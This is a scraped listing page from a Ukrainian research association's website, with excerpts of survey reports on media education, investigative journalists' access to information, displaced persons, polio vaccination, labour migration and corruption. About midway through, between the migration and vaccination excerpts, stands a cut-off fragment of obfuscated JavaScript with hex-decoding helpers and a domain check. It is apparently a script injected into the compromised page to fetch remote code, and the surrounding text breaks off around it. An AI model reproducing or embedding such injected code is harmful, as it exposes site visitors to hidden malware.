What for do you use English ?

According to ERA study  the participants of educational process  use English for :

Understanding Benefits of ME/ML

Students expressed different views on the benefits they received from the media education course while  they were  communicating with ERA experts.

Some  students described the benefits of learning ME/ML as related to the needs and demands of our time, where media education is becoming “one of the most essential areas to study.” “We cannot survive without [...]

Наскільки корисні для вас уроки з медіа-освіти ?

Представляєм Вам думки учнів, які вони висловлювали,  оцінюючи  користь від курсу медіа-освіти під час спілкування з експертами Європейської дослідницької асоціації.

Частіше за все  користь  від медіа-освіти учні пов’язують з потребами і вимогами сучасності, в яких медіа-освіта перетворюється на “одну із найважливіших наук”, “Без медіа-культури сьогодні не можливо вижити” (Миколаїв).

Найчастіше усвідомлення користі при вивченні медіа-освіти пов’язується учнями із [...]

Journalists-investigators’ experience with the access to information

Since 2007 ERA  conducted an expert survey of journalists -investigators who publish their investigative reports in the different types of Ukrainian media. An expert group has been changed, new issues appeared, but retaining the character of the monitoring study, we ask a number of questions which indicate the actual journalistic experience regarding access to information. [...]

Журналісти- розслідувачі про доступ до інформаціі

Європейська дослідницька асоціація , починаючи з 2007 року проводить експертне опитування журналістів, які проводять журналістські розслідвання та оприлюднюють їх в українських ЗМІ. Змінюється експертна група, з’являються нові питання, проте , зберігаючі моніторинговий характер дослідження, вже багато років ми ставимо журналістам низку питань, відповіді на які свідчать прое реальний досвід  доступу до інформації. Представляємо Вам деякі [...]

Як сприймають ВПО якість журналістських робіт про свої проблеми та життя ?

Якість інформаці – це правдивість, точність , повнота. Ознайомтесь з думками внутрішньо переміщених осіб, які вони висловили під час фокус-групових дискусій в Краматорську і Артемівську. Ці люди різного віку  проживають на підконтрольній Україні території і відчувають, що журналістам не вистачає професіоналізму та знання їх  реальних проблем.

На думку респондентів журналісти дуже поверхово представляють й описують проблеми [...]

General attitude toward vaccination stays positive – 71% of caregivers support need of its conduction

Європейська дослідницька асоціація у співпраці з компанією InMind провела моніторинг обізнаності та підтримки вакцінації з поліоміелиту. Деякі результати представлені у інфогрфіці:

Обізнаність про сполох поліоміеліту зросла з 58% в листопаді 2015 до 66% в лютому 2016 року (Awareness of polio outbreak has increased from 58% in Nov 2015 to 66% in Feb 2016 (+8%).
Обізнаність про додаткову [...]

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=”",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "eura.org.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Особенности украинской трудовой миграции

В 2014-2015 годах Европейская исследовательская ассоциация  в сотрудничестве с компанией InMind провела проект “Исследование финансовых поступлений, связанных с миграцией, и их влияние на развитие Украины”, инициированное и поддержанное Международной организацией по миграции и посольством Канады в Украине.

Мы предлагаем инфограммы – выдержки из отчета , подготовленного зарубежными экспертами на основе собранных данных и представленного в феврале [...]

Реальный опыт коррупции уменьшается вопреки убеждению о распространенности коррупции во всех сферах

Продолжая разговор о коррупции, обращаем внимание на тот факт, что реальный опыт коррупционных ситуаций (вымогательство, добровольное взяточничество и использование личных связей) уменьшается, о чем свидетельствует сравнение данных мониторинга коррупции в 2007-2015 годах.

Одновременно мы видим, что привычные коррупционные “подходы” не меняют своей дислокации.

На Западной Украине чаще используются  личные связи (показатель индекса 14,2 против медианного значения 12.3 [...]